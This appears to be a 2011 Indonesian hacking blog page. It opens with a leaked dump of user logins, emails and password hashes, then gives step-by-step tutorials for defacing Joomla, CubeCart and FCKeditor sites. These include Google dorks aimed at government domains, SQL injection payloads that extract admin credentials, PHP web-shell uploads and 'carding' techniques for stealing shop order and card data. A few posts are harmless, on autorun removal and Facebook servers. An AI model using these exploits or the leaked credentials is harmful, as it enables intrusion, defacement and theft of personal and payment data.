Auliya";s:9:"user_pass";s:32:"de3709b8e6f81a4ef5a858b7a2d28883";s:10:"user_email";s:19:"dianauliya@yahoo.de";s:8:"user_url";s:7:"http://";}i:42;a:5:{s:2:"ID";s:2:"61";s:10:"user_login";s:7:"rizkiki";s:9:"user_pass";s:32:"e172dd95f4feb21412a692e73929961e";s:10:"user_email";s:22:"ririez_green@yahoo.com";s:8:"user_url";s:27:"http://rizkiki.blogspot.com";}i:43;a:5:{s:2:"ID";s:2:"62";s:10:"user_login";s:6:"gasper";s:9:"user_pass";s:32:"ee7ffdb08663c80c41a09533d699c686";s:10:"user_email";s:20:"gasper_gsp@plasa.com";s:8:"user_url";s:29:"http://gaspergsp.multiply.com";}i:44;a:5:{s:2:"ID";s:2:"64";s:10:"user_login";s:19:"Konsultan Penulisan";s:9:"user_pass";s:32:"50ccdb4549b5399343ff5c2b3f512f86";s:10:"user_email";s:27:"konsultasi@penulislepas.com";s:8:"user_url";s:27:"http://www.penulislepas.com";}i:45;a:5:{s:2:"ID";s:2:"66";s:10:"user_login";s:8:"atalanta";s:9:"user_pass";s:32:"2fadc407d73f10716611a63a7d33442b";s:10:"user_email";s:27:"atalantadegradasi@yahoo.com";s:8:"user_url";s:32:"http://atalantamona.blogspot.com";}i:46;a:5:{s:2:"ID";s:2:"67";s:10:"user_login";s:13:"wiza anitasia";s:9:"user_pass";s:32:"83717c419ece39de912d782fb47f8a6e";s:10:"user_email";s:19:"wz_mylove@yahoo.com";s:8:"user_url";s:7:"http://";}i:47;a:5:{s:2:"ID";s:2:"68";s:10:"user_login";s:21:"pustakawanjugamanusia";s:9:"user_pass";s:32:"827ccb0eea8a706c4c34a16891f84e7b";s:10:"user_email";s:24:"abhicom200i@yahoo.com.sg";s:8:"user_url";s:7:"http://";}i:48;a:5:{s:2:"ID";s:2:"69";s:10:"user_login";s:10:"NawanIlham";s:9:"user_pass";s:32:"e10adc3949ba59abbe56e057f20f883e";s:10:"user_email";s:23:"gunawaniakc@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:49;a:5:{s:2:"ID";s:2:"70";s:10:"user_login";s:5:"pooh3";s:9:"user_pass";s:32:"0f3774a582381e882b342666bf32a2fa";s:10:"user_email";s:28:"putri_heriningtyas@yahoo.com";s:8:"user_url";s:7:"http://";}i:50;a:5:{s:2:"ID";s:2:"73";s:10:"user_login";s:8:"sepriana";s:9:"user_pass";s:32:"51361ea9e062db6c4620afeaee9a88ee";s:10:"user_email";s:19:"sepriana@telkom.net";s:8:"user_url";s:37:"http://catatan-revolusi.blogspot.com/";}i:51;a:5:{s:2:"ID";s:2:"75";s:10:"user_login";s:4:"Qyan";s:9:"user_pass";s:32:"47d95caeda6ab13fc4f6ec1f103af93d";s:10:"user_email";s:23:"qiky_tripod@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:52;a:5:{s:2:"ID";s:2:"77";s:10:"user_login";s:11:"agustianwar";s:9:"user_pass";s:32:"0b87597936a1bd2cd51b88cabe8c7f75";s:10:"user_email";s:17:"aanwarh@yahoo.com";s:8:"user_url";s:31:"http://agustianwar.multiply.com";}i:53;a:5:{s:2:"ID";s:2:"78";s:10:"user_login";s:7:"marfuah";s:9:"user_pass";s:32:"803a1aceb62e8f1eb4736f36475d7294";s:10:"user_email";s:20:"markunthil@yahoo.com";s:8:"user_url";s:7:"http://";}i:54;a:5:{s:2:"ID";s:2:"79";s:10:"user_login";s:6:"melody";s:9:"user_pass";s:32:"a4d2e2c1993cbfb48b9f368b2aebcdc3";s:10:"user_email";s:27:"novel_makcomblang@yahoo.com";s:8:"user_url";s:7:"http://";}i:55;a:5:{s:2:"ID";s:2:"80";s:10:"user_login";s:12:"arif mustofa";s:9:"user_pass";s:32:"ace20c0fa838d02a4299af7d90f020a0";s:10:"user_email";s:21:"arif_alfata@yahoo.com";s:8:"user_url";s:7:"http://";}i:56;a:5:{s:2:"ID";s:2:"81";s:10:"user_login";s:6:"bpanda";s:9:"user_pass";s:32:"d6b0ab7f1c8ab8f514db9a6d85de160a";s:10:"user_email";s:16:"l1ek99@yahoo.com";s:8:"user_url";s:7:"http://";}i:57;a:5:{s:2:"ID";s:2:"82";s:10:"user_login";s:10:"merzagamal";s:9:"user_pass";s:32:"641b2c0c2d57f6776fe530f279915bdb";s:10:"user_email";s:20:"merzagamal@yahoo.com";s:8:"user_url";s:50:"http://asia.groups.yahoo.com/group/ekonomi-islami/";}i:58;a:5:{s:2:"ID";s:2:"83";s:10:"user_login";s:4:"maya";s:9:"user_pass";s:32:"156044609eb527b3b743accc8e7b6d8a";s:10:"user_email";s:20:"vaceline83@yahoo.com";s:8:"user_url";s:16:"http://yahoo.com";}i:59;a:5:{s:2:"ID";s:2:"84";s:10:"user_login";s:10:"blue berry";s:9:"user_pass";s:32:"fd254f723587bb77667619cb67142433";s:10:"user_email";s:22:"blue7berries@yahoo.com";s:8:"user_url";s:28:"http://fifadila.multiply.com";}i:60;a:5:{s:2:"ID";s:2:"86";s:10:"user_login";s:10:"eristemena";s:9:"user_pass";s:32:"018a9567ea15470312c40d3e5d6bbcd4";s:10:"user_email";s:32:"e.ristemena@inartsmultimedia.com";s:8:"user_url";s:25:"http://www.ngoprek.web.id";}i:61;a:5:{s:2:"ID";s:2:"87";s:10:"user_login";s:9:"dk_destha";s:9:"user_pass";s:32:"36748cf6225d485b061ff9e581002c55";s:10:"user_email";s:17:"dewi168@gmail.com";s:8:"user_url";s:31:"http://www.dewi168.multiply.com";}i:62;a:5:{s:2:"ID";s:2:"89";s:10:"user_login";s:9:"shodiq354";s:9:"user_pass";s:32:"e10adc3949ba59abbe56e057f20f883e";s:10:"user_email";s:21:"shodiq354@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:63;a:5:{s:2:"ID";s:2:"90";s:10:"user_login";s:7:"bintang";s:9:"user_pass";s:32:"37704ddc1626ee9382182a3c8bee8598";s:10:"user_email";s:18:"j_sara_r@yahoo.com";s:8:"user_url";s:7:"http://";}i:64;a:5:{s:2:"ID";s:2:"92";s:10:"user_login";s:5:"ignas";s:9:"user_pass";s:32:"3c5d02d42a203d429c033fe124b9b761";s:10:"user_email";s:25:"sophi_melanesia@yahoo.com";s:8:"user_url";s:20:"http://papuapost.com";}i:65;a:5:{s:2:"ID";s:2:"93";s:10:"user_login";s:10:"aan gareng";s:9:"user_pass";s:32:"97e081dc0f2ed4c055bfee8b8b042b08";s:10:"user_email";s:21:"aan_gareng@telkom.net";s:8:"user_url";s:7:"http://";}i:66;a:5:{s:2:"ID";s:2:"97";s:10:"user_login";s:14:"endang guritno";s:9:"user_pass";s:32:"ad5340311b65ad259c4acc0b0b42e0a3";s:10:"user_email";s:16:"enggur@plasa.com";s:8:"user_url";s:26:"http://egisoe.multiply.com";}i:67;a:5:{s:2:"ID";s:2:"98";s:10:"user_login";s:8:"yulinava";s:9:"user_pass";s:32:"d5dab28939ce884e4cc0e9c479d14c1c";s:10:"user_email";s:19:"yuli_hade@yahoo.com";s:8:"user_url";s:33:"http://foodandtravel.multiply.com";}i:68;a:5:{s:2:"ID";s:2:"99";s:10:"user_login";s:4:"abdi";s:9:"user_pass";s:32:"35783207176001d23c0f73adb796dda2";s:10:"user_email";s:18:"abdi_nst@yahoo.com";s:8:"user_url";s:7:"http://";}i:69;a:5:{s:2:"ID";s:3:"100";s:10:"user_login";s:4:"arif";s:9:"user_pass";s:32:"cb0cf2658af457807caaf324b39a9f84";s:10:"user_email";s:25:"arif_khoiruddin@yahoo.com";s:8:"user_url";s:7:"http://";}i:70;a:5:{s:2:"ID";s:3:"104";s:10:"user_login";s:9:"martsiska";s:9:"user_pass";s:32:"f428b4c9b0f1f77a2d7ecbca984099ff";s:10:"user_email";s:19:"martsiska@gmail.com";s:8:"user_url";s:7:"http://";}i:71;a:5:{s:2:"ID";s:3:"106";s:10:"user_login";s:11:"winterlord_";s:9:"user_pass";s:32:"f3b1c3c2e6f743722e108f4b20af68ce";s:10:"user_email";s:23:"assasy_winter@yahoo.com";s:8:"user_url";s:7:"http://";}i:72;a:5:{s:2:"ID";s:3:"108";s:10:"user_login";s:7:"nadnuts";s:9:"user_pass";s:32:"e7a032a2e9a5226db58e0d82fbf4c931";s:10:"user_email";s:22:"nuts_is_good@yahoo.com";s:8:"user_url";s:28:"http://nadnuts.blogspot.com/";}i:73;a:5:{s:2:"ID";s:3:"110";s:10:"user_login";s:5:"ipoel";s:9:"user_pass";s:32:"280ef9eb07043f7b0cee44da3d28d578";s:10:"user_email";s:18:"FULHER22@yahoo.com";s:8:"user_url";s:20:"http://www.yahoo.com";}i:74;a:5:{s:2:"ID";s:3:"112";s:10:"user_login";s:7:"hadynur";s:9:"user_pass";s:32:"7572d5ba3c3dc48f3f3b907327ab771b";s:10:"user_email";s:17:"hadynur@yahoo.com";s:8:"user_url";s:7:"http://";}i:75;a:5:{s:2:"ID";s:3:"113";s:10:"user_login";s:16:"bambangpriantono";s:9:"user_pass";s:32:"c8a55aba66e6a626f25a7533b1190331";s:10:"user_email";s:32:"sanggralokaindonesia@yahoo.co.id";s:8:"user_url";s:36:"http://bambangpriantono.multiply.com";}i:76;a:5:{s:2:"ID";s:3:"115";s:10:"user_login";s:4:"biru";s:9:"user_pass";s:32:"202513fb838d3f99e972567b995fd9f3";s:10:"user_email";s:24:"obiecha_1710@hotmail.com";s:8:"user_url";s:7:"http://";}i:77;a:5:{s:2:"ID";s:3:"117";s:10:"user_login";s:12:"yons revolta";s:9:"user_pass";s:32:"4b376311332e02c403166422d1908394";s:10:"user_email";s:24:"freelance_corp@yahoo.com";s:8:"user_url";s:28:"http://penakayu.blogspot.com";}i:78;a:5:{s:2:"ID";s:3:"118";s:10:"user_login";s:4:"aaaa";s:9:"user_pass";s:32:"0b5f7dac24779d7e5bec8a4142573dd3";s:10:"user_email";s:18:"brontok7@yahoo.com";s:8:"user_url";s:7:"http://";}i:79;a:5:{s:2:"ID";s:3:"122";s:10:"user_login";s:13:"beatleberries";s:9:"user_pass";s:32:"e3fac67c9cab9659aead6cd16d51624a";s:10:"user_email";s:23:"beatleberries@yahoo.com";s:8:"user_url";s:7:"http://";}i:80;a:5:{s:2:"ID";s:3:"123";s:10:"user_login";s:8:"ajuliano";s:9:"user_pass";s:32:"291f1ef055cd20b83c8d86413db77b5f";s:10:"user_email";s:21:"ari.juliano@gmail.com";s:8:"user_url";s:30:"http://arijuliano.blogspot.com";}i:81;a:5:{s:2:"ID";s:3:"124";s:10:"user_login";s:11:"nursalam_ar";s:9:"user_pass";s:32:"66dfdac0ce808113c5408d1058004aee";s:10:"user_email";s:21:"nursalam_ar@yahoo.com";s:8:"user_url";s:28:"http://nursalam.multiply.com";}i:82;a:5:{s:2:"ID";s:3:"125";s:10:"user_login";s:3:"m3l";s:9:"user_pass";s:32:"0a7a76a569332fb8a96a312bbf81f623";s:10:"user_email";s:22:"m3l_orchid@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:83;a:5:{s:2:"ID";s:3:"127";s:10:"user_login";s:5:"amigo";s:9:"user_pass";s:32:"44eac6628804cfea3be916ffbd72fc19";s:10:"user_email";s:20:"ammy_ram@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:84;a:5:{s:2:"ID";s:3:"128";s:10:"user_login";s:9:"navastara";s:9:"user_pass";s:32:"8f808e4fd0cc56e0d2def2fd4bd530c6";s:10:"user_email";s:18:"krusakti@plasa.com";s:8:"user_url";s:7:"http://";}i:85;a:5:{s:2:"ID";s:3:"129";s:10:"user_login";s:6:"arum w";s:9:"user_pass";s:32:"c20fdd748bf5f7187fc47e8457662784";s:10:"user_email";s:16:"auwrin@yahoo.com";s:8:"user_url";s:7:"http://";}i:86;a:5:{s:2:"ID";s:3:"130";s:10:"user_login";s:7:"josleen";s:9:"user_pass";s:32:"4d4e5eed0c401622c6d6ee5286048736";s:10:"user_email";s:19:"collin_js@plasa.com";s:8:"user_url";s:7:"http://";}i:87;a:5:{s:2:"ID";s:3:"131";s:10:"user_login";s:11:"era sofiyah";s:9:"user_pass";s:32:"9ab9b3a4130398d900c73ba3ef0494e4";s:10:"user_email";s:27:"yasmin_friendship@yahoo.com";s:8:"user_url";s:7:"http://";}i:88;a:5:{s:2:"ID";s:3:"133";s:10:"user_login";s:6:"bahrul";s:9:"user_pass";s:32:"fe885dd176d45350b7147fc6a2ba2942";s:10:"user_email";s:20:"roel_atjeh@yahoo.com";s:8:"user_url";s:7:"http://";}i:89;a:5:{s:2:"ID";s:3:"139";s:10:"user_login";s:18:"bambang marhiyanto";s:9:"user_pass";s:32:"8d91761c2e23cc1aae9d214fec6bdace";s:10:"user_email";s:25:"mitrapressbook@telkom.net";s:8:"user_url";s:7:"http://";}i:90;a:5:{s:2:"ID";s:3:"140";s:10:"user_login";s:18:"benedictus_andreas";s:9:"user_pass";s:32:"6e194961e7687315f41f70b9a044a191";s:10:"user_email";s:33:"benedictusandreas_milis@yahoo.com";s:8:"user_url";s:7:"http://";}i:91;a:5:{s:2:"ID";s:3:"141";s:10:"user_login";s:7:"fifik05";s:9:"user_pass";s:32:"69aee9fcb3be015137029ab46d55d993";s:10:"user_email";s:18:"fifik_05@yahoo.com";s:8:"user_url";s:8:"http://-";}i:92;a:5:
=======================================

Dan masih banyak lagi kalo mau di explore, he he he ...
Saya hanya memberi tutorial, dan Tidak Bertanggung Jawab atas penggunaan tutorial ini jika disalah gunakan.

Tips : Bagi Anda, Siapapun anda. Jangan gunakan password standard yang mungkin dapat diketahui orang, gunakan kombinasi angka atau bahkan karakter karakter spesial. Misalkan Bismillah999*&^%$

Cara lama Hack Joomla 1.5.x

2011-01-19T16:07:00.002+07:00

cara deface situs yang di buat pake joomla.
langkah2 :(Untuk joomla 1.5.X)

1. cari situs yang dibangun menggunakan joomla, minta bantuan paman google. kata kunci: inurl:option=com_user
atau
inurl:option=com_user site:go.id -->khusus untuk situs pemerintah

2. temukan situs target misalnya:
http://www.target.go.id/index.php?option=com_user&view=login&.....dst

3. ganti alamat tersebut sehingga menjadi
http://www.target.go.id/index.php?option=com_user&view=reset&layout=confirm

4. pada form input yang tampil berikan tanda token tanda ' (tanda petik tunggal) lalu klik kirim

5. jika berhasil maka akan keluar form untuk mereset password. masukan password baru sesuai yang kita inginkan

6. klik submit atau enter maka password default administrator joomla akan di rubah

7. langkah selanjutnya masuk ke halaman login administator
alamatnya: http://www.target.go.id/administrator

masukan username : admin
password : (sesuai yang telah kita masukan waktu di reset)

LOGIN berhasil?

8. jika berhasil masuk ke menu Template manajer, cari template yang bertanda bintang dan rubah index.php dengan kode HTML yang kita inginkan

ket: (
a. khusus untuk joomla 1.5.x tepat nya 1.5.0 - 1.5.5 diatas 1.5.5 gak bisa udah di patch
b. administrator situs belum merubah default user administrator
c. untuk joomla 1.5.x yang belum di patch

cara melakukan Patch joomla supaya tidak bisa di hack seperti cara di atas:

1. buka file yang ada di folder component/com_user/model/reset.php
2. tambahkan script berikut (pada baris 113)

if(strlen($token) != 32) {
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

di bawah script : global $mainframe;

untuk menambah keamanan ganti default user administrator (admin) dengan yang lain.

Step By Step Joomla Hacking

2011-01-19T05:52:00.001+07:00

Step By Step SQL Injection "joomla"

**************************************************************************************
* title : exploit joomla : com_huruhelpdesk + reset password + pasang php shell
* author : ho1onk
* site : http://ho1onk.fairtopic.com
**************************************************************************************

============= PENGANTAR ============
khusus bagi teman2 yang
ga doyan donlod, jaringan lelet/lola
mungkin ini bisa jadi solusi
====================================

==========
[+] step 1
==========

buka google.. ketik keyword
Code:
"inurl:/index.php?option=com_huruhelpdesk\"

tes satu per satu
coba kita ambil yang ini

[+] step 2

==========

pasang exploit..

Code:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--

tu admin nya... :P
nampak..

==========
[+] step 3
==========

coba kita reset password nya

Code:

/index.php?option=com_user&view=reset

hm.. minta email dia.. masukin aj email admin tadi..

enter..

==========
[+] step 4
==========

minta activation pula
hmm.. gimana ne?
tenang.. kita cari dulu activationnya
Code:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_users--

tu kluar activatifasinya
hehehe
:)
lanjut...

copas aja ke yang tadi.. enter.. :)

==========
[+] step 5
==========

copas aja ke yang tadi.. enter.. :)

:P

==========
[+] step 6
==========

wkwkkw
minta pasword baru tu.. kasih aja..
hehhehe

==========

[+] step 7
==========

OK langsung aja masuk ke admin nya..
:)
Code:

http://[site]/[pacth]/administrator

wkekwekwke

==========
[+] step 8
==========

masuk ternyata.. heheh
sabar²..

nah.. di sini ente harus ubah dulu "Global configuration" nya
lalu setelah itu masuk ke "media manager"

==========
[+] step 9
==========

nah.. kita ke gloal configuration terlebih dahulu

ubah media settingnya, tambahin aja php

jangan lupa di save..
:D

==========
[+] step 10
==========

OK
lanjut..
buka media manager..

nah, ini tahap terakhir..

upload lah shell php mu..
kwkekwkekwe :)
seep selesai..

bila tidak ada tulisan berwarna merah berrti berhasil..

shell kita ada di sini

Code:

http://[site]/[pacth]/images/namashell.php

OK sekarang terserah ente.. mau apain tu site..

saran ane.. kalo bisa..
uploada aja lagi shell di directory yang lain..
lalu hapus shell yang di directory images tadi..

sekian aja dulu
selamat mencoba.. :D

Tutor Singkat deface dengan txt.

2011-01-13T22:05:00.001+07:00

Tutorial singkat deface with *.txt

[+] exploit
http://site/[patch]/fckeditor/editor/filemanager/connectors/test.html

OK kali ini saya akan memberikan tutorial deface paling gampang yang baru saya temukan di tanggal 5 janury 2011 
Sebenranya banyak cara deface.. apa lagi php nuke sangat banyak bug nya
Ga ada SS karma ini sangat gampang.. 

“Just Deface”

=======================
[+] langkah pertama [+]
=======================

Langkah pertama yang hasrus kita lakukan seperti biasa juga..
Nnya dulu sama si google
Dork..

Inurl:Masukin dork
Inurl: fckeditor/editor/
Inurl:filemanager/connectors/ site:.my
inurl:connectors/uploadtest.html site:.my :P

udah blom?
Heheh
OK seep.. lanjut..
Buka site nya..

Kali ini saya coba site
http://www.slfc.net.cn

=======================
[+] langkah ke dua [+]
=======================

OK lanjut..
Masukin exploitnya
Jadinya kayak gini
http://www.slfc.net.cn/php/FCKeditor/edi.../test.html

SS

=======================
[+] langkah ke tiga [+]
=======================

Nah, kalo udah muncul yang kayak gitu udah pada tau kan..?
Sama seperti tutor ecommerce
OK, pilih php,,
Pilih file defacean kita
Upload..
Kalo keluar kotak dialog bertuliskan “file uploade with no errors” berrti berhasil

========================
[+] langkah ke empat [+]
========================
Cari file uploadtan kita..
Klik get folder and files..

untuk contoh ini ada di
"/php/userfiles/file/"
jadinya
demo: http://localshost/php/userfiles/file/[file kamu]
ex : http://www.slfc.net.cn/php/userfiles/file/hn.txt
Nah.. sekarang lihat url file kita tadi,, seep..
But just deface..

No shell!
html juga ga bisa :)
hehhe kalo mau yang shel bisa pake ini..
out side : tutor deface joomla wiht shell

NB: Mungkin ini masih bisa di kembangkkan lagi.. untuk upload shell dengan memanipulasi file.. tapi saya belum berhasil karna saya masih newbie

Sekian dari saya,
terimakasih

================================================
Autor : ho1onk a.k.a hogyz
email : ho1onk@mail.com
site : http://ho1onk.cz.cc
forum : http://hacker-newbie.org
title : upload *.txt file Vulnerability
dork : filemanager/connectors
================================================

Bug CMS

2011-01-13T22:00:00.000+07:00

tanpa banyak basa basi. ntar keburu basi.
langsung mas bro :
1. searching target dengan dork "allinurl:media.php?module=" di google
2. tentukan target.
3. tambahkan dir di belakang site target tadi, jadi nya http://target.com/admin
4. kalo bisa terbuka halaman adminya, silahkan cek web itu udah di pacht ato belum, caranya
dengan menambahkan content.php?module=user
misal : http://target.com/admin/content.php?module=user
5. dan kalo terbuka.. akan ada daftar admin website itu dan kita juga bisa mengedit ati menambah admin nya.
setelah itu silahkan login.. dan happy hacking...

sumber : dopunk.blogspot.com

Deface Pendahuluan + Tutor Dasar

2011-01-13T20:42:00.000+07:00

nih ngemeng ngemeng banyak yg request. banyak pengen d ajarin deface wkwkwk. saya juga masi bego kalo kaya gini. masi suka nanya nanya d forum. yaudah ni buat pendahuluannya. makanya follow blog gw. apa susah nya coba.
oke cekiTOD. eh salah cekidot. wkwkwkwwkwk.
apa itu deface ?
deface : melakukan perubahan pada halaman web pada situs-situs tertentu, yang dilakukan oleh para hacker atau team tertentu dengan gerakan undergroundnya sebagai sebuah cyber gang fight untuk mengganggu informasi yang dimunculkan pada halaman situs yang dimaksud.

Ada banyak cara untuk nge deface web
but karna saya masih newbie.. saya masih dekit tau nya

maaf sebelumnya kalo ini ga berguna.. :)
hanya memberikan apa yang saya tau kepada teman² semua

OK kali ini saya akan memberikan tutor deface singkat
ada dua.. 1 upload *.html dan 1 lgi upload *.txt
jamin 1 jam dapet min 10 site :D

[+] exploit : http://localhost/[pacth]/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

Ok langsung aja yah..
sesuai judul CubeCart Upload file

buka google
masukkan dork.. terserah mau gimana caranya
salah satu nya adalah
intext:'powered by CubeCart v 3.x'

cari satu per satu,,
nah, kalo udah dapet target kito coba masukin exploit
ne hasil nya

siph deh bisa :P

1. pada connector pilih PHP
2. lalu pilih file html yang udah kita siapin.. trz klik Upload

Nah tandanya berhasil ato tidah uploadtan kita gini
Lihat SS berikut
“file uploaded with no errors”

OK, udah berhasil di upload.. tapi file kita dimana ya?
Langsung klik Get folder and files

Kurang lebih seperti ini

Code:

<Connector command="GetFoldersAndFiles" resourceType="File">
<CurrentFolder path="/" url="/[pacth]/file/"/>
â��
<Folders>
<Folder name="test"/>
</Folders>
â��
<Files>
<File name="a_asp;_jpg(1).gif" size="53"/>
<File name="a_asp;_jpg.gif" size="53"/>
<File name="fe.php6" size="188"/>
<File name="robtz.html" size="18"/>
<File name="fe.php?" size="188"/>
<File name="fe_php." size="188"/>
<File name="hn(1).txt" size="1"/>
<File name="hn.txt" size="1"/>
<File name="r57.php~" size="108"/>
</Files>
</Connector>

Dari data di atas kita bisa lihat file kita ada di “url/[pacth]/file/robtz.html”
Example : http://site.gov.my/fileupload/file/robtz.html

bakal keliatan seperti SS berikut..

Nah sekarang coba buka di halamna baru url tadi..
Itu lah halaman file yang kita upload tadi

seep..
kita berhasil masukin file deface an..
untuk shell sepertinya bisa dengan menyisipkan script ke dalam file tertentu seperti sudah pernah di jelaskan kk Alecs..

gimana? gampang bukan?
heheheh

====================================================================================
================================================
Autor : ho1onk a.k.a hogyz
email : ho1onk@mail.com
site : http://ho1onk.cz.cc
forum : http://hacker-newbie.org
title : CubeCart v 3.x Upload file Vulnerability
dork : powered by CubeCart v 3.x
================================================

Menghapus autorun.inf

2011-01-12T19:15:00.000+07:00

Sering menemukan file aneh di flashdisk kamu kayak contohnya Autorun.inf (nie yg biasanya) lalu folder dengan angka2 acak seperti 1231, 787, dsb. Jangan mengira itu virus, itu sebenarnya adalah suatu proteksi dari SMADAV untuk mengunci file autorun yg biasanya digunakan oleh virus mengeksploitasi celah keamanan windows, sehingga fiile induk virus dapat dijalankan saat user sedang menyucuk flashdisknya. Jika kita ingin menghapusnya pasti sangat kesulitan karena biasanya ditolak mentah mentah oleh windows dengan tulisan yang menggangu mata dan telinga (hehehehe) contohnya: nul. This autorun.inf is LOCKED by SMAD?V to protect your Flash-Disk from virus infection. Dan folder yg ingin kita hapus itu adem ayem aja tak berubah maksud saya tidak terhapus. Untuk menghapusnya langsung saja buka NOTEPAD dan ketikkan perintah dibawah ini:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

rd/s/q E:\con\aux\nul. This autorun.inf is LOCKED by SMAD?V to protect your Flash-Disk from virus infection.
rd/s/q E:\con\aux
rd/s/q E:\con

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Rubah E: menjadi nama drive flasdisk kamu berada contoh di F: maka ganti E: yg diatas jadi F:

Save As dengan terlebih dahulu merubah File Types menjadi “All FIle” utk file name terserah loe aja dan harus berakhiran .bat (cth hapus autorun.bat{harus ada akhiran .bat kalo gx gx bisa jalan}) …..

lalu stlah itu saat yg ditunggu-tunggu tiba klik file yg anda buat tadi cth hapus autorun.bat dan langsung hapus folder terlaknat tsb pasti sudah langsung mampus tu folder…..

ATAU yang mau simple gx mau repot-repot berlagak kayak hacker professional bisa pake TOOL di bawah ini:

1. SMAD Lock Remover

2. FastCopy

3.KillBox
cari di mbah google aja tool tool di atas

Semoga membantu………..

Sekilas Di balik Facebook

2011-01-12T18:50:00.003+07:00

Ane lg maen di forum tetangga ga twu nya nemu yg ky bgni'n...
ga usah basa-basi langsung aja deh...
cekidot...

====================================================================================
Mungkin dengan gambar ini kita bisa tau kenapa facebook minim sekali down
langsung aja

Data Center ini terdiri dari kurang lebih 15000 Server

Hemat Energi
Baris ini server ditetapkan untuk meminimalkan energi yang dibutuhkan untuk menjaga data center berjalan.

Tertumpuk
Tampilan tumpukan server facebook dalam dua rak

Pengaturan Thermometer
Data Center ini dilengkapi perlengkapan pendingin yang canggih dan cadangan power

jaringan
Kabel terhubung server di pusat dengan satu sama lain dan fasilitas seluruh dengan dunia luar.

Rencana B dan C dan ...
Pusat dibangun menggunakan "replikasi berlapis" model yang membuat hampir tidak mungkin gagal, bahkan jika Server di San Francisco Overload.

Lebih Dekat

WebServer
Server proses update ke halaman agar pengguna secepat mungkin, sehingga komentar atau posting tinggal dalam hitungan detik. berlipat 550 juta (dan terus bertambah) pengguna dan membutuhkan kekuatan pusat data yang luar biasa.

wah hebat yah !!
don't forget follow my blog !!

Hide Ip Easy

2011-01-11T16:39:00.001+07:00

wah gas wat mas bro.
waktu ane nyoba nyoba cari bug website. buat hacking. eh ada bacaan hack attempt logged and will be reported to your isp. yang artinya kalo ga salah ya. anda mencoba untuk hack login dan akan di laporkan ke ISP anda. gitu deh. gini gini juga jago bahasa inggris. wwkakwkak. bohong. sya bodo :D.
terus WAH saya kaget bangettt. jah kaget <<. kaya orang bego aja kaget sama kaya gini. slow mas bro. uakakakak. padahal asli kaget. haha.yaudah nanya ke guruku aja bapak google. eh di kasi hide ip easy. trus oke deh ip nya ke hidden. mau download ??ni deh di kasi. klik ini mas bro
oh iya. ni juga di sertakan crack nya ko. supaya full version. :D

SQL injection Vulnerability

2011-01-11T14:47:00.000+07:00

# Author: Pokeng

# Platform / Tested on: Win/Linux

# category: webapps/0day

# Dork : inurl:detalii_categorii.php

# Bugs : http://[site]detalii_categorii.php?id=[SQLI]

# Exploit : 1+and+1=0+union+select+all+1,2,3,concat_ws(0x3a,username,parola,email_user),5,6,7,8,9,10+from+useri--

# Example : http://[site]detalii_categorii.php?id=1+and+1=0+union+select+all+1,2,3,concat_ws(0x3a,username,parola,email_user),5,6,7,8,9,10+from+useri--

Done !!

Silahkan di coba ya

Teknik Carding

2011-01-11T14:19:00.002+07:00

Teknik - Teknik Carding :

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->
